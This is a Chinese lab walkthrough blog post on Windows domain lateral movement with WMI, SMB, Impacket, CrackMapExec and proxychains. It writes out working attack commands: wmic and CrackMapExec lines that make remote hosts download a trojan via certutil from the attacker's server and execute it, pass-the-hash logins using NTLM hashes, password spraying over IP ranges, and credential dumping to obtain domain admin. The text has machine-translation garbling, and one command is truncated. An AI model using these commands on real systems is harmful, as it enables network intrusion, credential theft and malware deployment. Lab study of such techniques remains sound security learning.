第129天:内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
这里这个情况继承上一篇文章搭建的情况https://i-blog.csdnimg.cn/direct/932db5d3266a46f286dc7a7a7ccbf726.png
案例一: 域横向移动-WMI-自带&下令&套件&插件
起首上线win2008
https://i-blog.csdnimg.cn/direct/a822b0fa7b0749e194cb1b6334ba89f4.png
起首提权到system权限
https://i-blog.csdnimg.cn/direct/991f1a1dceea43368ef11a35bb959134.png
wmic是windows自带的下令,可以通过135端口进行连接利用,只支持明文方式,长处是不用上传别的东西,缺点是无回显。
利用system权限抓取明文密码和hash密码
https://i-blog.csdnimg.cn/direct/d96386e79d1e48aca32c84c4e7678208.png
直接获得了域控管理员的账号密码
https://i-blog.csdnimg.cn/direct/d4932f4f2a814b02b1ac6361dac6939a.png
探测存活主机
https://i-blog.csdnimg.cn/direct/c47d4daeaff145bcb7b6ff4b8c2f6fab.png
https://i-blog.csdnimg.cn/direct/f5ec3a56cb8a4761b8663759821654ee.pnghttps://i-blog.csdnimg.cn/direct/b56717cdba63481688b2ebe55fc32eb7.png
进一步的信息收集上一篇文章写过
win2008开启监听并生成木立刻传到本地web服务器
https://i-blog.csdnimg.cn/direct/6c1a714f6fed4d26957c5af84b9ff43e.png
https://i-blog.csdnimg.cn/direct/b83de6c01dcb443da6696015fc46a8d7.png
https://i-blog.csdnimg.cn/direct/e731905fa6274cc4b054925319c041c1.png
https://i-blog.csdnimg.cn/direct/3311d679ac494954802a9fd4ad79f649.png
wmic
利用wmic下令去连接别的主机,让目标主机去下载木马
wmic /node:目标ip /user:账号 /password:密码 process call create "执行命令"
wmic /node:192.168.3.30 /user:administrator /password:admin@123 process call create "certutil -urlcache -split -f http://192.168.3.20/2.exe 2.exe"
连接乐成一样平常只有这种显示
https://i-blog.csdnimg.cn/direct/38e1bb2f47314d62a9c932013f8637f1.png
乐成上传
https://i-blog.csdnimg.cn/direct/598a2a6a6075496e8e74f08f523833c5.png
让他执行
https://i-blog.csdnimg.cn/direct/9b497e2009fc4468ab15057e0bc5dc06.png
乐成上线
https://i-blog.csdnimg.cn/direct/47127d821b9b4356b3409afdd161558c.png
缺点就是没有任何回显
cscript
项目地点:https://github.com/AA8j/SecTools/tree/main/wmiexec.vbs
特点是会反弹一个新的窗口就导致没有办法在cs当中去运行,类似反弹shell,并且得借助一个vbs文件,且不支持hash
https://i-blog.csdnimg.cn/direct/c29a3f704e1a4dca92d4945f6453e498.png
在3.20(win2008主机)上运行
cscript //nologo wmiexec.vbs /shell 192.168.3.30 账号 密码
cscript //nologo wmiexec.vbs /shell 192.168.3.21 administrator 123.com https://i-blog.csdnimg.cn/direct/f4934c56e78c4621b3e4382b6f48048d.png
弹过来的新窗口反弹的ip为3.30
https://i-blog.csdnimg.cn/direct/ecad81a7dce641a2a304b26eb3c52975.png
wmiexec-impacket
下载地点
1、Py版:https://github.com/SecureAuthCorp/impacket
python atexec.py god/administrator:Admin12345@192.168.3.21 “ver”
python atexec.py -hashes :ccef208c6485269c20db2cad21734fe7 ./administrator@192.168.3.21 “whoami”
2、Exe版:https://gitee.com/RichChigga/impacket-examples-windows
这种方式又拥有回显,又可以适配cs
生成代理节点
https://i-blog.csdnimg.cn/direct/a541287a345e43539f7ce0f135064531.png
https://i-blog.csdnimg.cn/direct/88f40e74c4144969913cebfe57c8b78d.png
https://i-blog.csdnimg.cn/direct/a52bdcd04a1c42f4bcea72dac494cc0f.png
这里由于我是linux情况直接执行py文件,exe文件一个原理
wmiexec ./账号:密码@ip "命令"
wmiexec 域名/账号:密码@ip "命令"
wmiexec ./administrator:admin!@#45@192.168.3.32 "whoami" https://i-blog.csdnimg.cn/direct/8243ad35089b478f93c3406dbc22333d.png
实验使用域控的hash进行连接
https://i-blog.csdnimg.cn/direct/21c04d09b5d946acbbc32d87e2d3d467.png
wmiexec -hashes :hash值 (域名或者.)/账号@192.168.3.40 "whoami" https://i-blog.csdnimg.cn/direct/030f3ac4fa3f49cd92d1203f5cf45c46.png执行上线
proxychains4 python wmiexec.py -hashes :afffeba176210fa/administrator@192.168.3.40 "certutil -urlcache -split -f h c:/222.exe & c:/222.exe"
https://i-blog.csdnimg.cn/direct/30a5f3e401fa46b597f89e4a7633732c.png
案例二: 域横向移动-SMB-自带&下令&套件&插件
利用的是smb开放的445端口
下令
项目地点:PsTools - Sysinternals | Microsoft Learn
psexe也是反弹一个cmd以是不能直接在cs当中运行
windows官方用法
psexec64 \\192.168.3.32 -u administrator -p admin!@#45 -s cmd
这里由于我是linux系统以是我直接把文件拖入win2008进行运行,并且运行该文件的时候cmd权限必须为admin,这里也可以用socks代理执行,并且权限已经是system可以执行。
20执行获得30的cmd
https://i-blog.csdnimg.cn/direct/62d644bba9df47d788ec7ff49a32be0f.png
套件
使用套件中的psexec
wmi套件中
psexec.py ./administrator:123.com@192.168.3.30
psexec.py -hashes :518b98ad4178a53695dc997aa02d455c ./administrator@192.168.3.30 https://i-blog.csdnimg.cn/direct/97cfc8b3f3464dafa87c0b812d827293.pnghttps://i-blog.csdnimg.cn/direct/a9f00b8c9d114ce3a05bf670905befb6.png
套件当中尚有一个smbexec.py文件
python smbexec.py ./administrator:123.com@192.168.3.40
python smbexec.py -hashes :579da618cfbfa85247acf1f800a280a4 administrator@192.168.20.30
同样也是会弹出一个新的cmd会话
https://i-blog.csdnimg.cn/direct/91cf266308a648b9a3d460a207f634f4.png
cs自带
https://i-blog.csdnimg.cn/direct/eb8a57dd195046c49a1db126df7ce4a0.png
先需要设置转发上线,由于内网不出网
https://i-blog.csdnimg.cn/direct/a00406c84d21419086f44523efda4e57.png
选择域控密码,大概主秘密码
https://i-blog.csdnimg.cn/direct/e4504dcd16814abca2c8cf6e7c80ebbf.png
域控上线
https://i-blog.csdnimg.cn/direct/99a01fb7bd20489b845e028dab94e035.png 利用psexec64+主机hash值上线win7
https://i-blog.csdnimg.cn/direct/49cb379798fe4b6eb365fa3b4e4e1131.png
由于这里我所有主机都是一个密码,以是直接选这个,记得他会自动加上win2008的域,记得删除,然后就是提醒我们在内网渗出过程当中要实验切换域内用户的登录方式,大部分会自动加上域
https://i-blog.csdnimg.cn/direct/8405ff8599314d44a996b3759f54f504.png
乐成上线
https://i-blog.csdnimg.cn/direct/adc831597a4f4b5895305aff2bac8e4e.png
案例三: 域横向移动-工具-Proxychains&CrackMapExec
这里proxychains我一直在用,不做过多先容了
crackmapexec下载地点:(kali自带)GitHub - byt3bl33d3r/CrackMapExec: A swiss army knife for pentesting networks
根本用法
探测存活主机
crackmapexec smb 192.168.3.10-40 #探测存活主机 https://i-blog.csdnimg.cn/direct/55928028fa4d464abe20bf583e75a2b3.png
https://i-blog.csdnimg.cn/direct/f3022c39928b4f8ba054f87569149aba.png
密码喷射域登录
crackmapexec smb 192.168.3.10-40 -u jie -p 123.com https://i-blog.csdnimg.cn/direct/14060bad08884ab3ac40f9c8161dcd0f.png这里由于我没有把密码和主机进行绑定,以是域内所有主机都可以用这个密码登录
https://i-blog.csdnimg.cn/direct/38d43894d4ee4eac95bd10566e2d22c6.png
密码喷射本地登录
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth https://i-blog.csdnimg.cn/direct/a679d29087004cbabc875277be8c1cab.png
https://i-blog.csdnimg.cn/direct/ff5fab8945ac438ca1540d19e1e8255e.png
密码喷射本地登录加执行下令
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com --local-auth -x "whoami" https://i-blog.csdnimg.cn/direct/f4461f54064941b69d53704ff4f05504.png
https://i-blog.csdnimg.cn/direct/0dbdeaf1c2004255b544fea487155b15.png
实验上线,记得设置转发上线,ip需要设置为内网ip
https://i-blog.csdnimg.cn/direct/e1aeac55e07b4418b8ea9425d3f5dcb2.png
利用下面的下令下载web服务器中的木马,并实验运行上线
crackmapexec smb 192.168.3.10-40 -u administrator -p 123.com -x "certutil -urlcache -split -f http://192.168.3.20/2.exe c:/zzzzz.exe & c:/zzzzz.exe"
https://i-blog.csdnimg.cn/direct/7603ec33f08d476e9eec99619c938367.png
https://i-blog.csdnimg.cn/direct/eace5ac8beb94339a4fb51bb321ba4e9.png
https://i-blog.csdnimg.cn/direct/80c4a79c6040478bbc3111dd3343f9e5.png 除了域控主机之外都上线了,切换域控密码喷射
https://i-blog.csdnimg.cn/direct/998db8562ea0419984a24e21cc7ec695.png
高阶玩法
当收集到一台域内主机以后,可以实验把收集到的密码,用户都写入字典当中
注意收集用户的时候不能用提权的账户,需要用域内账户
https://i-blog.csdnimg.cn/direct/5738f3cb60af41f5b22d907858feb30c.png
https://i-blog.csdnimg.cn/direct/2ed968901c744b2f8c39622f01740e32.png
这里密码我根本上都是123.com
https://i-blog.csdnimg.cn/direct/755a905c65c245a4a1426ee2663a3e23.png
https://i-blog.csdnimg.cn/direct/c72150b84cb240139ed0e9cf82edafdc.png
运行,这里注意要加一个参数,否则运行一个乐成匹配后就不会继承往下运行
--continue-on-success 用字典密码去匹配
https://i-blog.csdnimg.cn/direct/e17521a885094a1585918597f955b93a.png
https://i-blog.csdnimg.cn/direct/fb1585e93d38403fb74bfda3266327ed.png
这个加continue参数好像只可以或许匹配密码,不能全上线,不加参数的话又指挥上线一个就掉了,不太懂了,可以匹配出来密码,用账号密码,一个一个去上线?
https://i-blog.csdnimg.cn/direct/4357fc71c0b245038bf26a7eaa7fde17.png
https://i-blog.csdnimg.cn/direct/d84b0e82f6694965a2132e13ce2c9407.png
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]